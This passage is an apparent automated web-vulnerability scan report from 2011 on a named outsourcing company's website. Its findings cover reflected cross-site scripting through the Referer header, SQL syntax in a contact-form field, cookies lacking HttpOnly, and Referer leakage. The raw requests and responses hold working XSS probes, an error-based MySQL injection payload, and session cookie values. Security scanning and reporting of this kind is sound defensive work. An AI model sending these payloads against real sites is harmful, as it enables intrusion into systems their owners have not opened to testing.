<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="c6094"><script>alert(1)</script>101d74c0fb1">
...[SNIP]...
2.15. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebab5<script>alert(1)</script>d3d540a0446 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=ebab5<script>alert(1)</script>d3d540a0446

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>d3d540a0446">ebab5<script>alert(1)</script>d3d540a0446</a>
...[SNIP]...
2.16. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b8fa"><script>alert(1)</script>4cfa6b62c76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=6b8fa"><script>alert(1)</script>4cfa6b62c76

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="6b8fa"><script>alert(1)</script>4cfa6b62c76">
...[SNIP]...
2.17. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf2c1"><script>alert(1)</script>c4d3a9f67b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=cf2c1"><script>alert(1)</script>c4d3a9f67b5

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="cf2c1"><script>alert(1)</script>c4d3a9f67b5">
...[SNIP]...
2.18. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1f635<script>alert(1)</script>1ad16fbec38 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=1f635<script>alert(1)</script>1ad16fbec38

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>1ad16fbec38">1f635<script>alert(1)</script>1ad16fbec38</a>
...[SNIP]...
2.19. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4209d<script>alert(1)</script>63ccf94baec146c0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3 HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=4209d<script>alert(1)</script>63ccf94baec146c0f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 15086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>63ccf94baec146c0f">4209d<script>alert(1)</script>63ccf94baec146c0f</a>
...[SNIP]...
2.20. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 97ae5<script>alert(1)</script>45e24329356 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=97ae5<script>alert(1)</script>45e24329356

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>45e24329356">97ae5<script>alert(1)</script>45e24329356</a>
...[SNIP]...
2.21. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7373f"><script>alert(1)</script>d1a5d93dd12 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=7373f"><script>alert(1)</script>d1a5d93dd12

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="7373f"><script>alert(1)</script>d1a5d93dd12">
...[SNIP]...
2.22. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34e5"><script>alert(1)</script>877d9c910208441b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3 HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=c34e5"><script>alert(1)</script>877d9c910208441b1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 14348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="c34e5"><script>alert(1)</script>877d9c910208441b1">
...[SNIP]...
3. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 366

p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
4. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://www.outsourcingdotnetdevelopment.com/mail/captcha.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /mail/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mail/captcha.php HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 19 Feb 2011 13:09:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2j93q89hg8bokkcibvm5k8qof5; path=/
Content-Type: image/jpeg
Content-Length: 851

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 15
...C.5%(/(!5/+/<95?P.WPIIP.u{a..........................................C.9<<PFP.WW....................................
...[SNIP]...
4.2. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3kaph9nntlc0q0itqu1nu3js27; path=/
Content-Type: text/html
Content-Length: 7083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
5. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

POST /outsourcing-dot-net-development-contact-us.html?1'=' HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Content-Length: 104

p_name=Ronald+Smith&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 191732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development.html" target="_blank" title="web application development,,">web application development</a><a href="http://www.rubysoftwaredevelopment.com/ruby-on-rails-development.html" target="_blank" title="ruby on rails development,ruby on rails developers,ruby on rails ruby developers">ruby on rails development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-jacksonville.html" target="_blank" title="mobile application development jacksonville,iphone,blackberry">mobile application development jacksonville</a>
...[SNIP]...
</a><a href="http://www.rubysoftwaredevelopment.com/sinatra-development.html" target="_blank" title="sinatra development,sinatra developers,sinatra ruby developers">sinatra development</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/aquarium-development.html" target="_blank" title="aquarium development,aquarium developers,aquarium python developers">aquarium development</a>
...[SNIP]...
</a><a href="http://www.flashdevelopersindia.com/flex-application-development-india.html" target="_blank" title="flex application development india,flex web application development india,flex web programming india">flex application development india</a><a href="http://www.mobiledevelopmentindia.com/symbian-mobile-application-development.html" target="_blank" title="symbian mobile application development,symbian mobile software development india,offshore symbian mobile application development">symbian mobile application development</a><a href="http://www.mobiledevelopmentindia.com/about-us.html" target="_blank" title="mobile application development,software development outsourcing,offshore software development">mobile application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-columbus.html" target="_blank" title="mobile application development columbus,iphone,blackberry">mobile application development columbus</a><a href="http://www.flashdevelopersindia.com/hire-flash-developers-india.html" target="_blank" title="hire flash developers india,hire flash programmers india,hire flash professionals india">hire flash developers india</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-glasgow.html" target="_blank" title="mobile application development glasgow,iphone,blackberry">mobile application development glasgow</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-hyderabad.html" target="_blank" title="mobile application development hyderabad,iphone,blackberry">mobile application development hyderabad</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/beautiful-soup-development.html" target="_blank" title="beautiful soup development,beautiful soup developers,beautiful soup python developers">beautiful soup development</a>
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/ajax-web-application-development.html" target="_blank" title="ajax web application development,,">ajax web application development</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/mysql-database-administration.html" target="_blank" title="mysql database administration,,">mysql database administration</a><a href="http://www.pythonwebdevelopment.com/pylons-development.html" target="_blank" title="pylons development,pylons developers,pylons python developers">pylons development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-los-angeles.html" target="_blank" title="mobile application development los angeles,iphone,blackberry">mobile application development los angeles</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-london.html" target="_blank" title="mobile application development london,iphone,blackberry">mobile application development london</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-sunderland.html" target="_blank" title="mobile application development sunderland,iphone,blackberry">mobile application development sunderland</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-denver.html" target="_blank" title="mobile application development denver,iphone,blackberry">mobile application development denver</a><a href="http://www.mobiledevelopmentindia.com/technologies.html" target="_blank" title="technologies,software technology,web technology">technologies</a><a href="http://www.phpsoftwaredevelopment.com/php-software-development-contact-us.html" target="_blank" title="php software development - contact us,,">php software development - contact us</a><a href="http://www.androidmobiledevelopment.com/android-map-navigation-application.html" target="_blank" title="android map navigation application,android application development,google android applications">android map navigation application</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-pune.html" target="_blank" title="mobile application development pune,iphone,blackberry">mobile application development pune</a><a href="http://www.pythonwebdevelopment.com/pychart-development.html" target="_blank" title="pychart development,pychart developers,pychart python developers">pychart development</a><a href="http://www.mobiledevelopmentindia.com/meego-mobile-application-development.html" target="_blank" title="meego mobile application development,custom meego mobile application development services,hire meego developers">meego mobile application development</a><a href="http://www.pythonwebdevelopment.com/grok-development.html" target="_blank" title="grok development,grok developers,grok python developers">grok development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-liverpool.html" target="_blank" title="mobile application development liverpool,iphone,blackberry">mobile application development 